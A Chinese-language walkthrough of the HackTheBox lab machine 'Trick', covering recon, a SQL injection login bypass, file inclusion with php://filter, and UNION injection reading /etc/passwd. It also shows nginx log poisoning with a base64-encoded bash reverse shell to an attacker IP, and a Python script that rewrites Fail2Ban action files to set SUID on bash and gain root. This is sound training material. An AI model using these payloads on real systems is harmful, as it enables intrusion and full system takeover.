目标信息
IP地址:
10.129.227.180(非固定IP地址)
信息收集
ICMP检测
PING 10.129.227.180 (10.129.227.180) 56(84) bytes of data.
64 bytes from 10.129.227.180: icmp_seq=1 ttl=63 time=789 ms
64 bytes from 10.129.227.180: icmp_seq=2 ttl=63 time=709 ms
64 bytes from 10.129.227.180: icmp_seq=3 ttl=63 time=425 ms
64 bytes from 10.129.227.180: icmp_seq=4 ttl=63 time=857 ms
--- 10.129.227.180 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 424.988/695.197/857.330/164.606 ms
攻击机和靶机间网络连接状态良好。
防火墙检测
# Nmap 7.99 scan initiated Tue May 19 09:18:47 2026 as: /usr/lib/nmap/nmap -sF -p- --min-rate 3000 -oN fin_result.txt 10.129.227.180
Nmap scan report for root.trick.htb (10.129.227.180)
Host is up (0.62s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open|filtered ssh
25/tcp open|filtered smtp
53/tcp open|filtered domain
80/tcp open|filtered http
# Nmap done at Tue May 19 09:19:32 2026 -- 1 IP address (1 host up) scanned in 45.79 seconds
靶机疑似开放了4个TCP端口。
网络端口扫描
TCP端口扫描结果
# Nmap 7.99 scan initiated Tue May 19 23:45:08 2026 as: /usr/lib/nmap/nmap -sT -sV -A -p- --min-rate 3000 -oN tcp_result.txt 10.129.180.84
Warning: 10.129.180.84 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.180.84
Host is up (1.2s latency).
Not shown: 65052 closed tcp ports (conn-refused), 479 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
| 256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_ 256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
53/tcp open domain (generic dns response: SERVFAIL)
| dns-nsid:
|_ id.server: hkg08
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
80/tcp open http nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.99%I=7%D=5/19%Time=6A0CF68D%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x02\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 3 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 0.05 ms 172.17.0.1
2 216.99 ms 10.10.16.1
3 217.18 ms 10.129.180.84
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 19 23:52:37 2026 -- 1 IP address (1 host up) scanned in 449.28 seconds
UDP端口扫描结果
# Nmap 7.99 scan initiated Tue May 19 23:53:54 2026 as: /usr/lib/nmap/nmap -sU -p- --min-rate 3000 -oN udp_ports.txt 10.129.180.84
Warning: 10.129.180.84 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.180.84
Host is up (0.99s latency).
Not shown: 65279 open|filtered udp ports (no-response), 255 closed udp ports (port-unreach)
PORT STATE SERVICE
53/udp open domain
# Nmap done at Tue May 19 23:58:07 2026 -- 1 IP address (1 host up) scanned in 253.23 seconds
同时发现,靶机运行Debian Linux操作系统,开启了22/ssh、25/smtp、53/dns和80/http四个TCP服务,根据HackTheBox内容规则,靶机主域名应当为trick.htb。
服务探测
SSH服务(22端口)
尝试使用ssh命令连接靶机,检查其登录方式:
ssh root@trick.htb
发现靶机允许使用密码和密钥登录。
DNS服务(53端口)
尝试使用dig命令查询目标DNS服务内的主要记录:
dig any trick.htb @trick.htb
发现子域名root.trick.htb,尝试使用AXFR区域传输:
dig axfr trick.htb @root.trick.htb
成功发现另一个子域名:preprod-payroll.trick.htb!
Web应用程序(80端口)
主域名、root子域名
打开主页:http://trick.htb/
发现该站点主页为静态页面,提示网站正在建设中。尝试扫描目录,但未发现任何信息。
访问http://root.trick.htb/,可发现该子站点内容和主站点完全相同:
preprod-payroll子域名
打开主页:http://preprod-payroll.trick.htb
发现该子站点为后台订单管理系统,使用PHP语言开发。首先打开BurpSuite拦截,随便输入一对凭据登录,分析整个登录业务流程:
前端会直接将输入的用户密码明文发送到后端,当凭据错误时,后端会返回数字3,尝试在用户名出加入单引号,测试SQLi漏洞:
发现后端返回了错误信息,称SQLi结果集对象不存在,成功确定此处存在SQLi漏洞!
渗透测试
SQLi漏洞利用绕过登录
在服务探测过程中,我们已经发现靶机Web服务登录框存在SQLi注入漏洞,现在通过其进行登录绕过操作。根据登录点功能不难推断,后端通过执行类似于如下的SQL语句,根据返回值判断登录凭据是否有效:
SELECT username,password FROM users WHERE username = '<USER>' AND password = '<PASS>';
而我们可以将用户名更改为' or true -- -,这样后端SQL实际上就变成了:
SELECT username,password FROM users WHERE username = '' or true -- -' AND password = '<PASS>';
在这种情况下,后端程序将会捕获SQL查询返回的第一条记录,直接将HTTP请求通过Repeater功能重放:
此时后端返回了数字1,尝试刷新浏览器页面:
登录成功!
文件包含漏洞挖掘利用
登录后台后,对后台各个功能进行翻看,发现后台渲染各个功能点页面的方式是通过接收page参数值实现的:
尝试访问http://preprod-payroll.trick.htb/payroll.php,发现文件存在:
高度怀疑此处存在文件包含漏洞。打开BurpSuite拦截,尝试使用php://filter伪协议读取payroll.php源代码:
php://filter/read=convert.base64-encode/resource=payroll
成功发现文件包含漏洞!尝试阅读payroll.php源代码,发现后台还存在payroll_items页面,用于提供查看订单详细信息的功能,其中数字格式的id参数被传入:
$('.view_payroll').click(function(){
var $id=$(this).attr('data-id');
location.href = "index.php?page=payroll_items&id="+$id;
});
进一步读取payroll_items.php源代码,发现id参数未经过滤检查就被直接插入到了SQL数据中,造成SQLi漏洞:
$pay = $conn->query("SELECT * FROM payroll where id = ".$_GET['id'])->fetch_array();
直接点击Payroll页面上任意记录的查看按钮,访问Payroll Items功能,并打开BurpSuite拦截:
尝试使用如下注入语句,探查SQL语句实际选中的字段数:
1 order by 1-- -
逐步增加ORDER BY字句的参数值,当增加到8时,页面返回了空白信息:
确定实际选中的字段数为7,尝试利用UNION SELECT语句测试注入数据显示的位置:
5555 union select 'misaka','misaka','misaka','misaka','misaka','misaka','misaka'-- -
使用load_file()函数读取/etc/passwd文件,成功:
5555 union select 1,load_file('/etc/passwd'),3,4,5,6,7-- -
尝试读取/etc/nginx/nginx.conf文件:
......
http {
......
access_log /var/log/nginx/access.log;
error_log /var/log/nginx/error.log;
......
include /etc/nginx/conf.d/*.conf;
include /etc/nginx/sites-enabled/*;
}
......
可知Nginx访问日志路径为/var/log/nginx/access.log,站点配置目录为/etc/nginx/sites-enabled/,尝试读取该目录下default配置文件:
server {
listen 80;
listen [::]:80;
server_name preprod-marketing.trick.htb;
root /var/www/market;
index index.php;
location / {
try_files $uri $uri/ =404;
}
location ~ \.php$ {
include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php7.3-fpm-michael.sock;
}
}
成功发现虚拟主机preprod-marketing.trick.htb,其目录为/var/www/market/。
尝试使用文件包含漏洞读取/var/www/market/index.php:
php://filter/read=convert.base64-encode/resource=/var/www/market/index
发现该页面的作用仅为使用include()方法包含由page参数指定的页面,其过滤机制可轻松使用双写方法绕过。综合以上信息,决定向/var/log/nginx/access.log日志文件写入PHP木马内容,再访问preprod-marketing.trick.htb,对访问日志进行包含,从而执行任意命令。
首先使用BurpSuite发出GET访问请求,User-Agent处为木马内容:
<?php system(base64_decode('L2Jpbi9iYXNoIC1jICdiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE2LjMvNDQzIDA+JjEn')); ?>
随后在本机443端口打开netcat监听,并访问:http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././..././..././..././var/log/nginx/access.log
反弹Shell成功!!
权限提升
目录信息收集
进入靶机michael用户后,执行sudo -l命令查看当前用户Sudo权限:
发现当前用户可以root身份免密运行Fail2Ban服务管理脚本/etc/init.d/fail2ban,但只允许进行重启操作。
尝试通过find命令查找属于当前用户组security的文件或目录:
find / -group security -exec ls -ld {} \; 2>/dev/null
发现Fail2Ban的Action配置文件目录/etc/fail2ban/action.d/对于当前用户可写,经分析研判,决定在目录内创建恶意Action配置文件,让其在服务重启时自动执行,从而达到提权目标。
Fail2Ban恶意配置提权
在目录信息收集阶段,我们已经确定靶机Fail2Ban配置目录/etc/fail2ban/action.d/目录可写,且当前用户michael可通过Sudo重启服务,并决定通过修改Action配置文件添加恶意命令的方式进行提权。
首先查看该目录下配置文件:
ls -lA /etc/fail2ban/action.d/
发现配置目录下文件过多,且无法确定哪些配置文件被真正激活,决定编写如下脚本文件,通过对目录下配置文件逐个删除并重建的方式注入恶意命令,并执行Sudo触发操作:
#!/usr/bin/python3
import os
action_directory = "/etc/fail2ban/action.d"
evil_config = "[Definition]\nactionstart = /bin/chmod 4755 /bin/bash\n[Init]\nname = default\n"
actionConfigList = os.listdir(action_directory)
for configFile in actionConfigList:
os.remove("{}/{}".format(action_directory, configFile))
with open("{}/{}".format(action_directory, configFile), 'w+') as f:
f.write(evil_config)
os.system("sudo /etc/init.d/fail2ban restart")
成功添加SUID Bash!直接使用执行如下命令修改root用户密码:
/bin/bash -p
python3 -c "import os;os.setuid(0);os.setgid(0);os.system('passwd root')"
提权成功!!!!